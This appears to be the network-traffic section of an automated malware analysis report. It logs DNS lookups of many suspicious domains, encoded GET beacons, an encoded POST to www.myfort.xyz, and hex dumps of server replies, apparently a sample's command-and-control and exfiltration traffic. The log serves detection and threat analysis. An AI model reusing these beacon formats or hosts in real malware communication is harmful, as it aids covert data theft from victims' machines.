                Source: global trafficHTTP traffic detected: GET /3bhb/?fjF4t=sL5yMLd2FYeygdxeEIvBIUJATH+hR9jTWzzciCFMdKLUtT5KyNs8m+FI5sdRuxE6SnYGbNiE6d4kQgxaXEFskhjEc+g4L8pNQ6Iw2gTgcz2BGD7t6jx2AFaiuzL6hq7vRw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.nagwagi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /nnzm/?fjF4t=1Cn9cwGlPcxkozyn/QxQVSyt/Fhi8VjB79+KMkYxvXhakNZDqqRaeSSrKQAjUMucgEm9T8ybz5k5gHJ1SxmoQ3zT0TlxDU/EDvhtRqwfutL7i7Qqa656wXycWWkC+AmSWg==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.spacewalker.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ss5l/?fjF4t=MZ6hDPItOp3DWI1NZHE1UlRpEwhGpVB3+XHb7RTZ7n905/gqyZTRh0dsgYkJdVt0wXBS/CFStR2ZbfuNZlYleQZC51C+nIWr41eWo5Lt7T+CPfBWt0SnRpP3PTgH9jhFCw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.arasmm.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.needethereum.xyz
                Source: global trafficDNS traffic detected: DNS query: www.myfort.xyz
                Source: global trafficDNS traffic detected: DNS query: www.kedutaan.xyz
                Source: global trafficDNS traffic detected: DNS query: www.primepath.net
                Source: global trafficDNS traffic detected: DNS query: www.limanbetgirislinki.fit
                Source: global trafficDNS traffic detected: DNS query: www.amtdevelopment.pro
                Source: global trafficDNS traffic detected: DNS query: www.amzavy.info
                Source: global trafficDNS traffic detected: DNS query: www.thisisnonft.studio
                Source: global trafficDNS traffic detected: DNS query: www.nevath.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fstudy.xyz
                Source: global trafficDNS traffic detected: DNS query: www.conpactum.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fandatv.net
                Source: global trafficDNS traffic detected: DNS query: www.nagwagi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.spacewalker.app
                Source: global trafficDNS traffic detected: DNS query: www.arasmm.info
                Source: unknownHTTP traffic detected: POST /xqx9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCache-Control: no-cacheConnection: closeContent-Length: 206Content-Type: application/x-www-form-urlencodedHost: www.myfort.xyzOrigin: http://www.myfort.xyzReferer: http://www.myfort.xyz/xqx9/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like GeckoData Raw: 66 6a 46 34 74 3d 2f 49 74 78 79 6e 2f 67 7a 74 48 6c 38 47 47 6a 67 48 4d 53 6c 58 31 54 38 65 73 73 32 57 49 30 55 6e 7a 48 49 44 62 37 53 2b 6f 6a 46 76 30 78 57 37 33 61 61 49 55 33 46 59 33 56 53 4c 66 65 67 44 4c 6a 34 79 54 4b 46 43 50 7a 33 72 2b 53 6f 79 74 46 54 33 38 68 30 70 39 2f 6b 42 70 31 57 39 75 46 32 31 33 62 75 34 74 7a 59 72 5a 41 2f 54 6c 62 73 56 50 56 35 76 47 68 43 49 51 39 4b 59 66 6c 39 66 42 79 70 37 6b 71 38 6f 6a 39 65 2b 4b 53 74 32 75 30 6e 78 6f 79 32 49 75 67 77 63 65 79 59 54 39 53 4c 42 59 6f 4b 56 35 71 66 31 56 73 50 43 70 2f 35 4b 68 4c 33 64 51 2f 57 67 64 52 62 56 77 3d Data Ascii: fjF4t=/Itxyn/gztHl8GGjgHMSlX1T8ess2WI0UnzHIDb7S+ojFv0xW73aaIU3FY3VSLfegDLj4yTKFCPz3r+SoytFT38h0p9/kBp1W9uF213bu4tzYrZA/TlbsVPV5vGhCIQ9KYfl9fByp7kq8oj9e+KSt2u0nxoy2IugwceyYT9SLBYoKV5qf1VsPCp/5KhL3dQ/WgdRbVw=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 24 Feb 2025 09:26:29 GMTserver: LiteSpeedData Raw: 31 62 32 30 0d 0a 90 7b 27 a2 aa d6 43 00 1a 29 0b e7 ef f7 b7 37 cd ef f8 e7 0b d3 19 19 12 8c 64 e7 1c 79 f1 1e c7 d5 36 72 3b 58 7a 92 c9 22 50 e1 c9 76 aa d5 df 32 ad 3f 5b 55 73 b8 bf 56 6a ca cb 80 04 48 bb 13 cf ba f7 f2 b7 ee 2e 0f 16 48 26 41 82 0f c8 96 27 95 e3 e1 5f ae ff ff df af 32 1f 44 21 23 13 1f 3b e9 00 82 22 56 f7 81 28 12 4d 02 45 f5 a4 03 dc dd 03 78 df bd ef ff 5f bf 1a 78 18 49 46 12 74 07 88 16 6c 8c a8 71 0b 24 63 f7 ac 31 bb de b1 da c7 50 7d 6d 77 ba fd 44 01 51 11 35 be d8 28 01 2d ad 27 93 07 3b 6c ed f4 55 53 14 7d 99 35 b8 f9 f7 af 94 ae 27 84 10 d2 4a 24 44 be 6c a0 d8 c0 5e cc 0e 5b bb 22 e5 4e 87 08 a8 7a 8e 27 e1 8d 00 a7 5b 50 94 b6 8f f5 ad 46 70 64 4e de 1b 67 5a 6d c9 13 eb 9b 91 18 c2 84 c7 af 15 f2 ea db fb 77 e4 db 0e 5a 00 af 02 33 7e 55 bd bc fb 14 6b ca 09 d2 11 7d 8b f3 58 6a 0b 6a 21 c2 a7 da 68 10 df 6f 6b dc 2f 52 e7 f2 0b 16 f3 34 2d 2b 27 ef 62 05 d6 ec 83 74 80 a9 eb da 34 40 6b 8e a6 f4 ee d1 85 5c c8 2c ad bd c3 b8 c7 27 d7 c7 40 fb 5e 28 e5 fe 5b 41 83 16 d6 9f 74 03 c4 79 24 93 80 1d 87 e4 8f 9b e5 62 b1 22 03 00 77 f1 49 e3 6e 60 37 b3 1a ad a5 59 f0 5b 8f 71 c6 ce 59 cd 5a 7d 9c 9b 56 37 30 ef a4 be 4d 38 e4 ab 7b cc 3f 23 e9 7a 72 f2 80 84 0d 58 9b b6 c9 4d 64 b7 d1 fc 0f 51 51 dd a3 a7 c4 6c 04 d9 1a fc e7 da 94 a0 c4 6c 38 19 bc 6a fd b4 71 73 e3 30 18 17 4d 39 8f e6 7f c8 c9 79 96 65 dd 91 2c 2e ff d4 c2 c7 ac de ea 63 56 b9 38 5f f6 7e 2e 96 bb 19 3b e7 3b 4b d3 2e 98 16 3a 8d 3b e9 00 c9 b3 0a b3 b0 a7 21 ba 9e a4 a7 44 22 75 45 4e d3 c9 a2 f7 37 f2 df 43 07 ad bf 33 5f 01 d1 b8 26 12 45 06 ba d5 11 be 07 4b 73 8f 9b 65 91 16 69 94 07 e9 43 53 b4 cf 69 aa 48 4b 1f a0 48 01 7c 85 45 ba b8 94 99 3c 2f d2 eb e5 f1 7a 59 a4 54 50 38 22 cd e9 9a 1a 07 83 a0 71 df c0 cc 88 fb e6 96 1b f7 cd f3 b7 03 e3 7e 7e be 0f 25 d0 7c a0 a5 77 a5 46 52 24 cd 70 31 99 f4 48 91 1e ba b9 30 89 16 e9 5d dc 08 e4 6f fe 3c 80 05 1d 41 b6 c6 c9 bb f8 70 0f 41 5d c9 6b b9 a4 e3 b8 9a a4 a7 d3 f1 1f 5e 59 6d 2c 10 13 89 ee d1 cf c7 19 68 18 2a 72 9a 4e a6 0d 89 16 c9 8c 70 7c d8 eb 40 bc 88 02 56 fb 9a 26 25 03 3e 60 b8 df 9f 83 6a 18 23 b1 a5 6f 10 31 e6 20 52 a4 48 2e f7 d3 b9 9c 52 ef 93 f0 b1 66 7c 5c 45 88 d1 78 f7 15 7d d0 0d c8 08 f8 1a a1 65 5e bc f9 fa f1 83 8c 18 8c 6b 4c 7d cf 90 f3 51 c0 e7 0c e3 48 42 6d 3b 06 02 85 e3 03 c8 91 ae 57 e0 0b 94 c8 32 91 09 90 a5 76 7b 1d 65 dc d6 9b d4 30 99 2b c4 05 c8 da 58 fb 0d 8e c8 50 64 22 e3 2b 47 7c 4f 3b 38 90 ef c6 e1 f9 f2 71 08 fa 9e 81 6c 00 5f b7 ba 81 67 1a 35 f8 37 29 Data Ascii: 1b20{'C)7dy6r;Xz"Pv2?[UsVj
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 24 Feb 2025 09:26:32 GMTserver: LiteSpeedData Raw: 31 62 32 30 0d 0a 90 7b 27 a2 aa d6 43 00 1a 29 0b e7 ef f7 b7 37 cd ef f8 e7 0b d3 19 19 12 8c 64 e7 1c 79 f1 1e c7 d5 36 72 3b 58 7a 92 c9 22 50 e1 c9 76 aa d5 df 32 ad 3f 5b 55 73 b8 bf 56 6a ca cb 80 04 48 bb 13 cf ba f7 f2 b7 ee 2e 0f 16 48 26 41 82 0f c8 96 27 95 e3 e1 5f ae ff ff df af 32 1f 44 21 23 13 1f 3b e9 00 82 22 56 f7 81 28 12 4d 02 45 f5 a4 03 dc dd 03 78 df bd ef ff 5f bf 1a 78 18 49 46 12 74 07 88 16 6c 8c a8 71 0b 24 63 f7 ac 31 bb de b1 da c7 50 7d 6d 77 ba fd 44 01 51 11 35 be d8 28 01 2d ad 27 93 07 3b 6c ed f4 55 53 14 7d 99 35 b8 f9 f7 af 94 ae 27 84 10 d2 4a 24 44 be 6c a0 d8 c0 5e cc 0e 5b bb 22 e5 4e 87 08 a8 7a 8e 27 e1 8d 00 a7 5b 50 94 b6 8f f5 ad 46 70 64 4e de 1b 67 5a 6d c9 13 eb 9b 91 18 c2 84 c7 af 15 f2 ea db fb 77 e4 db 0e 5a 00 af 02 33 7e 55 bd bc fb 14 6b ca 09 d2 11 7d 8b f3 58 6a 0b 6a 21 c2 a7 da 68 10 df 6f 6b dc 2f 52 e7 f2 0b 16 f3 34 2d 2b 27 ef 62 05 d6 ec 83 74 80 a9 eb da 34 40 6b 8e a6 f4 ee d1 85 5c c8 2c ad bd c3 b8 c7 27 d7 c7 40 fb 5e 28 e5 fe 5b 41 83 16 d6 9f 74 03 c4 79 24 93 80 1d 87 e4 8f 9b e5 62 b1 22 03 00 77 f1 49 e3 6e 60 37 b3 1a ad a5 59 f0 5b 8f 71 c6 ce 59 cd 5a 7d 9c 9b 56 37 30 ef a4 be 4d 38 e4 ab 7b cc 3f 23 e9 7a 72 f2 80 84 0d 58 9b b6 c9 4d 64 b7 d1 fc 0f 51 51 dd a3 a7 c4 6c 04 d9 1a fc e7 da 94 a0 c4 6c 38 19 bc 6a fd b4 71 73 e3 30 18 17 4d 39 8f e6 7f c8 c9 79 96 65 dd 91 2c 2e ff d4 c2 c7 ac de ea 63 56 b9 38 5f f6 7e 2e 96 bb 19 3b e7 3b 4b d3 2e 98 16 3a 8d 3b e9 00 c9 b3 0a b3 b0 a7 21 ba 9e a4 a7 44 22 75 45 4e d3 c9 a2 f7 37 f2 df 43 07 ad bf 33 5f 01 d1 b8 26 12 45 06 ba d5 11 be 07 4b 73 8f 9b 65 91 16 69 94 07 e9 43 53 b4 cf 69 aa 48 4b 1f a0 48 01 7c 85 45 ba b8 94 99 3c 2f d2 eb e5 f1 7a 59 a4 54 50 38 22 cd e9 9a 1a 07 83 a0 71 df c0 cc 88 fb e6 96 1b f7 cd f3 b7 03 e3 7e 7e be 0f 25 d0 7c a0 a5 77 a5 46 52 24 cd 70 31 99 f4 48 91 1e ba b9 30 89 16 e9 5d dc 08 e4 6f fe 3c 80 05 1d 41 b6 c6 c9 bb f8 70 0f 41 5d c9 6b b9 a4 e3 b8 9a a4 a7 d3 f1 1f 5e 59 6d 2c 10 13 89 ee d1 cf c7 19 68 18 2a 72 9a 4e a6 0d 89 16 c9 8c 70 7c d8 eb 40 bc 88 02 56 fb 9a 26 25 03 3e 60 b8 df 9f 83 6a 18 23 b1 a5 6f 10 31 e6 20 52 a4 48 2e f7 d3 b9 9c 52 ef 93 f0 b1 66 7c 5c 45 88 d1 78 f7 15 7d d0 0d c8 08 f8 1a a1 65 5e bc f9 fa f1 83 8c 18 8c 6b 4c 7d cf 90 f3 51 c0 e7 0c e3 48 42 6d 3b 06 02 85 e3 03 c8 91 ae 57 e0 0b 94 c8 32 91 09 90 a5 76 7b 1d 65 dc d6 9b d4 30 99 2b c4 05 c8 da 58 fb 0d 8e c8 50 64 22 e3 2b 47 7c 4f 3b 38 90 ef c6 e1 f9 f2 71 08 fa 9e 81 6c 00 5f b7 ba 81 67 1a 35 f8 37 29 Data Ascii: 1b20{'C)7dy6r;Xz"Pv2?[UsVj
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"content-length: 6943content-encoding: brvary: Accept-Encodingdate: Mon, 24 Feb 2025 09:26:35 GMTserver: LiteSpeedData Raw: 22 f7 2e a2 aa d6 43 00 1a 29 0b e7 ef f7 b7 37 cd ef f8 e7 0b d3 19 19 12 8c 64 e7 1c 79 f1 1e c7 d5 36 72 3b 58 7a 92 c9 22 50 e1 c9 76 aa d5 df 32 ad 3f 5b 55 73 b8 bf 56 6a ca cb 80 04 48 bb 13 cf ba f7 f2 b7 ee 2e 0f 16 48 26 41 82 0f c8 96 27 95 e3 e1 5f ae ff ff df af 32 1f 44 21 23 13 1f 3b e9 00 82 22 56 f7 81 28 12 4d 02 45 f5 a4 03 dc dd 03 78 df bd ef ff 5f bf 1a 78 18 49 46 12 74 07 88 16 6c 8c a8 71 0b 24 63 f7 ac 31 bb de b1 da c7 50 7d 6d 77 ba fd 44 01 51 11 35 be d8 28 01 2d ad 27 93 07 3b 6c ed f4 55 53 14 7d 99 35 b8 f9 f7 af 94 ae 27 84 10 d2 4a 24 44 be 6c a0 d8 c0 5e cc 0e 5b bb 22 e5 4e 87 08 a8 7a 8e 27 e1 8d 00 a7 5b 50 94 b6 8f f5 ad 46 70 64 4e de 1b 67 5a 6d c9 13 eb 9b 91 18 c2 84 c7 af 15 f2 ea db fb 77 e4 db 0e 5a 00 af 02 33 7e 55 bd bc fb 14 6b ca 09 d2 11 7d 8b f3 58 6a 0b 6a 21 c2 a7 da 68 10 df 6f 6b dc 2f 52 e7 f2 0b 16 f3 34 2d 2b 27 ef 62 05 d6 ec 83 74 80 a9 eb da 34 40 6b 8e a6 f4 ee d1 85 5c c8 2c ad bd c3 b8 c7 27 d7 c7 40 fb 5e 28 e5 fe 5b 41 83 16 d6 9f 74 03 c4 79 24 93 80 1d 87 e4 8f 9b e5 62 b1 22 03 00 77 f1 49 e3 6e 60 37 b3 1a ad a5 59 f0 5b 8f 71 c6 ce 59 cd 5a 7d 9c 9b 56 37 30 ef a4 be 4d 38 e4 ab 7b cc 3f 23 e9 7a 72 f2 80 84 0d 58 9b b6 c9 4d 64 b7 d1 fc 0f 51 51 dd a3 a7 c4 6c 04 d9 1a fc e7 da 94 a0 c4 6c 38 19 bc 6a fd b4 71 73 e3 30 18 17 4d 39 8f e6 7f c8 c9 79 96 65 dd 91 2c 2e ff d4 c2 c7 ac de ea 63 56 b9 38 5f f6 7e 2e 96 bb 19 3b e7 3b 4b d3 2e 98 16 3a 8d 3b e9 00 c9 b3 0a b3 b0 a7 21 ba 9e a4 a7 44 22 75 45 4e d3 c9 a2 f7 37 f2 df 43 07 ad bf 33 5f 01 d1 b8 26 12 45 06 ba d5 11 be 07 4b 73 8f 9b 65 91 16 69 94 07 e9 43 53 b4 cf 69 aa 48 4b 1f a0 48 01 7c 85 45 ba b8 94 99 3c 2f d2 eb e5 f1 7a 59 a4 54 50 38 22 cd e9 9a 1a 07 83 a0 71 df c0 cc 88 fb e6 96 1b f7 cd f3 b7 03 e3 7e 7e be 0f 25 d0 7c a0 a5 77 a5 46 52 24 cd 70 31 99 f4 48 91 1e ba b9 30 89 16 e9 5d dc 08 e4 6f fe 3c 80 05 1d 41 b6 c6 c9 bb f8 70 0f 41 5d c9 6b b9 a4 e3 b8 9a a4 a7 d3 f1 1f 5e 59 6d 2c 10 13 89 ee d1 cf c7 19 68 18 2a 72 9a 4e a6 0d 89 16 c9 8c 70 7c d8 eb 40 bc 88 02 56 fb 9a 26 25 03 3e 60 b8 df 9f 83 6a 18 23 b1 a5 6f 10 31 e6 20 52 a4 48 2e f7 d3 b9 9c 52 ef 93 f0 b1 66 7c 5c 45 88 d1 78 f7 15 7d d0 0d c8 08 f8 1a a1 65 5e bc f9 fa f1 83 8c 18 8c 6b 4c 7d cf 90 f3 51 c0 e7 0c e3 48 42 6d 3b 06 02 85 e3 03 c8 91 ae 57 e0 0b 94 c8 32 91 09 90 a5 76 7b 1d 65 dc d6 9b d4 30 99 2b c4 05 c8 da 58 fb 0d 8e c8 50 64 22 e3 2b 47 7c 4f 3b 38 90 ef c6 e1 f9 f2 71 08 fa 9e 81 6c 00 5f b7 ba 81 67 1a 35 f8 37 29 59 69 d4 5c 04 c5 e8 da d3 fd 46 08 Data Ascii: ".C)7dy6r;Xz"Pv2?[Us
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:26:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsNE0RNy7jVf%2BFTI911vHn5%2BNHOMwKCgVY3octM7835ssH5XQPy%2Fd7CpovI24IDtvErgeB4KgW3V7ACMI7Xh6lHEWsON2gD9OXiKlMGFCqqFLKpNX896pGgX%2BBc%2FkMSzkR7Z0Z2jKUyKlZ0Lig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916e6a773b687d1c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1762&rtt_var=881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a 31 32 66 36 0d 0a cc 5a d9 76 a3 4c 92 be ef a7 d0 b8 cf cc 74 1f ca c5 be f9 b7 6b 06 10 12 48 02 01 12 92 d0 4d 9f 04 92 45 ac 62 97 e6 f4 03 cd 6b cc 93 cd 91 ed aa df 65 4b 55 f5 77 cf c5 e4 85 45 66 46 44 46 c6 f2 05 ce e4 f1 5f c6 4b 69 ed 18 f2 28 6a b2 f4 cb 9f 1e 5f 7e 46 a3 d1 e8 31 82 c0 7f 7d cc 60 03 46 51 d3 94 f7 f0 d8 c6 dd d3 9d 54 e4 0d cc 9b fb e6 54 c2 bb 91 f7 d2 7b ba 6b e0 d0 a0 17 11 bf 8d bc 08 54 35 6c 9e da 26 b8 e7 ee 6e ca 01 5e 04 ef 2f fc 55 91 be 11 94 17 f7 de 65 ea 26 a3 51 81 30 03 7f 84 43 1e ca b8 82 f5 1b 16 ec 3b da 1c 64 f0 e9 ae 8b 61 5f 16 55 f3 86 ac 8f fd 26 7a f2 61 17 7b f0 fe b9 f3 69 14 e7 71 13 83 f4 be f6 40 0a 9f f0 cf df 44 35 71 93 c2 2f 14 46 8d f4 a2 19 4d 8a 36 f7 1f d1 97 c1 17 82 ba 39 a5 70 74 b1 db ab b9 bc ba 7e 65 be 34 b7 f0 4f a3 ff fa d6 bd b4 a0 c8 9b fb 00 64 71 7a 7a 18 09 55 0c d2 4f 23 05 a6 1d 6c 62 0f 7c 1a d5 20 af ef 6b 58 c5 c1 6f 1f d9 ea f8 0c 1f 46 38 55 Data Ascii: 1312f6ZvLtkHMEbkeKUwEfFDF_Ki(j_~F1}`FQTT{kT5l&n^/Ue&Q0C;da_U&za{iq@D5q/FM69pt~e4OdqzzUO#lb| kXoF8U
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:26:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u44tohTyLWHEsNgKevBacQYp6EjhCJITLyoot0QtYMVN793pFLgwJs1jTGohLjhL40VzZCQfFeXZlyCsvxfOg8eWZX8XN4491pFp%2FXDzBAnuR%2Bb57Ug%2BD6M0J3flotIIb3JoFJCi2ozP4XKy9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916e6a873c4f4232-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1759&rtt_var=879&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1734&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 59 93 a3 48 92 7e ef 5f a1 ed b5 35 9b 31 2a 87 fb ca ee 1a 5b 6e 90 04 e2 16 e8 8d 1b c4 29 6e 69 6c fe fb 9a b2 aa 7b aa b2 a4 ea ea 9d 7d d8 78 11 41 84 bb 87 bb 7f fe 79 24 f9 d3 4f 3f fd fa 1f fc 81 b3 7d 5d d8 e4 63 5d fd fd a7 5f 3f fd 6c 36 9b cd af 79 12 c4 9f 1f eb 64 0c 36 f9 38 76 2f c9 65 2a e6 8f 3f 73 6d 33 26 cd f8 32 5e bb e4 e7 4d f4 69 f6 f1 e7 31 59 47 f0 ae e2 97 4d 94 07 fd 90 8c 1f a7 31 7d a1 7e 7e aa 27 88 f2 e4 e5 2e df b7 d5 17 8a 9a f6 25 ba 2f 3d 15 d4 fb 20 ab 83 3f 23 21 ac 5d d1 27 c3 17 22 d0 57 7b 9b a0 4e 3e fe 3c 17 c9 d2 b5 fd f8 c5 b6 a5 88 c7 fc 63 9c cc 45 94 bc bc 4d 3e 6c 8a a6 18 8b a0 7a 19 a2 a0 4a 3e c2 7f fb 5d d5 58 8c 55 f2 77 0c c2 36 5a 3b 6e c4 76 6a e2 5f c1 4f 2f 3f 6d 18 c6 6b 95 6c ee 71 fb 1c ae 68 18 3e 0b df 47 d8 c6 d7 cd 3f 7e 9f de 47 da 36 e3 4b 1a d4 45 75 7d dd 30 7d 11 54 1f 36 72 52 cd c9 58 44 c1 87 cd 10 34 c3 cb 90 f4 45 fa cb b7 62 43 71 4b 5e 37 30 d6 ad 5f 2f 56 45 93 bc e4 49 91 e5 e3 eb 06 Data Ascii: fcbYYH~_51*[n)nil{}xAy$O?}]c]_?l6yd68v/e*?sm3&2^Mi1YGM1}~~'.%/= ?#!]'"W{N><cEM>lzJ>]XUw6Z;nvj_O/?mklqh>G?~G6KEu}0}T6rRXD4EbCqK^70_/VEI
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:26:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zkqKSuAuZfX4zmUABJTf7Q0Zdjl97Y3%2BuYLsFbd5Oaegx3PAbHbpVFFFvgGo6tVqgAlJlh11LC83A5hlXQj49YEbbm35Pc0nI0UyCwUntLVuUB8IreqXnAySJDKf5tEta0z3s7tJgqfzgveKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916e6a971e8a4321-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13202&min_rtt=13202&rtt_var=6601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=424&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 36 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 Data Ascii: 2a65<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <t
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Feb 2025 09:26:56 GMTContent-Type: text/htmlContent-Length: 3550Connection: closeETag: "64c9ae7b-dde"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 35 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 79 64 65 76 69 6c 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 3a 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 